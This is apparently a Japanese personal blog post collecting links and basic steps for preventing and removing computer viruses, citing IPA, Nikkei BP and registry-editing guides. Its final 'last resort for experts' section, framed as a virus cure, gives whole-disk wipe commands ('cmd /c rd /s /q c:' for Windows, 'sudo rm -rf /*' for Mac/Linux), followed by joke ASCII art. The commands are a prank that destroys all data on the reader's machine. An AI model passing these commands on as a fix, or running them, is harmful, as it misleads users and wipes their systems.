ウィルス対応まとめ[追記予定]

ウィルスとその対応についてのまとめ、今後も感染するたびに追記予定

感染しないようにするための「対策編」と感染後についての「対応(駆除)編」にわけて順次まとめてみる予定
といってもほぼ自分用リンク集（笑）

対策編

まずはウィルスについて知る事、少なくとも上２つは読んでね

• [日経BP]特集：そのときどうするウイルス感染（前編）
対策から駆除までの話

• [日経BP]特集：そのときどうするウイルス感染（後編）
駆除の後は、、、

• インターネットセキュリティナレッジ
[インターネットセキュリティナレッジ]ウィルス感染体感シミュレータなど、セキュリティ対策についてわかりやすく教えてくれるサイト
• [IPA]対策情報　ウイルス対策
ウィルス対策に必要な情報が一通りそろってます。

作る人

少なくとも[IPA]セキュア・プログラミング講座

使う人

• [IPA]脆弱性対策情報データベース
日々見つかる脆弱性についてのデータベース

対応(駆除)編

実際に感染（？）したことのあるもの

• [VirusRemover 2008] うぃるす [VRM_Free_jp.exe]
Windows用、こちらはマジなウィルス
• ダブルクリックしたらお兄ちゃんの負けね！.app
いたづらで入れられたMac用、あえて踏んでみるテスト

ウィルス駆除方法(導入編)

1. ネットワークから外す
二次感染をふせぐために、LANやモデムのケーブルをはずし、ネットワークから切断する。
2. ウイルスを特定する
ウィルス対策ソフト、もしくはgoogle先生に聞いてみる
3. ウイルスを駆除する
上で調べた結果に基づき、ウィルスを駆除する
4. システムを修復する
コンピュータをウィルスに感染する前の状態に戻す(ロールバックする)、それようのソフトもある、大事なファイルの確保後にクリーンインストールもあり
5. ウイルスチェックをする
ウイルス対策ソフトを最新版に更新し、コンピュータ全体のウイルスチェックを行い、ウイルスが感染に駆除できたかどうかを確認
6. ウイルス対策をする
今後のためにウィルス対策
7. IPAへ報告をする
情報処理推進機構 セキュリティセンター(IPA ISEC)に通報する、ウィルス感染時の相談も受けているらしい

よくわからない人は(1)の後にIPA(03-5978-7509)やウィルス対策ソフトのメーカーに電話で電話で問い合わせるのもよし、とりあえず1だけは確実に！！

ウィルス駆除方法(玄人編)

ウィルスを手動で駆除したい時に使うかもしれない情報

• システムの復元機能を有効/無効にする
手動駆除の前には必ず「システムの復元」を無効にすること、さもないとウィルスがバックアップされて、駆除した後にまた復元(感染)されてしまう。
( Me, XP, Vista )
• 2 spyware.com
右上の検索窓にスパイウェア名を入力して検索、検索結果の「PARASITES」から該当ウィルスを選択すると詳細説明と駆除方法が書かれており、ものによっては駆除ツールもダウンロードできる。（英語）
• [IPA]ウィルス情報データベース
情報処理推進機構(IPA)のウィルスデータベース、削除方法までは載ってないらしい
• [Microsoft]Microsoft Windows レジストリの説明
ウィルスを手動で駆除するときに関係する「レジストリ」についての説明と編集方法 、IPAのデータベースと合わせて使うとよし、ただし責任はもてない
• [にししふぁくとりー]レジストリ編集解説
• ビギナーズ　レジストリ大全

最終手段

玄人向け
どんなウィルスもいちころさ！ウィルスへの八つ当たり用コマンド

for Windows

[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする

by ちょｗｗｗｗｗｗウイルスが検出されたｗｗｗｗｗ

実行例

for Mac / Linux / Unix

sudo rm -rf /*

その後

---

￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣｣
―――――――――――――‐┬┘
　　　　　　　　　　　 　 　 　 　 　 　 |
　　 　 　 ＿＿＿＿.＿＿＿＿ 　　 |　.＿＿　 いらないＰＣを
　　　　　|　 　 　 　 | 　 　 　 　|　　 |　|＼＿＼　　窓から
　　　　　|　 　 　 　 | ∧＿∧　|　　 |　|　 |.◎.｜　投げ捨てろ
　　　　　|　 　 　 　 |（　´∀｀）つ ミ |　|　 |.：　｜
　　　　　|　 　 　 　 |/ ⊃　 ﾉ　|　　 |　.＼|.≡.｜
　 　 　 　￣￣￣￣'￣￣￣￣　 　 |　　　

---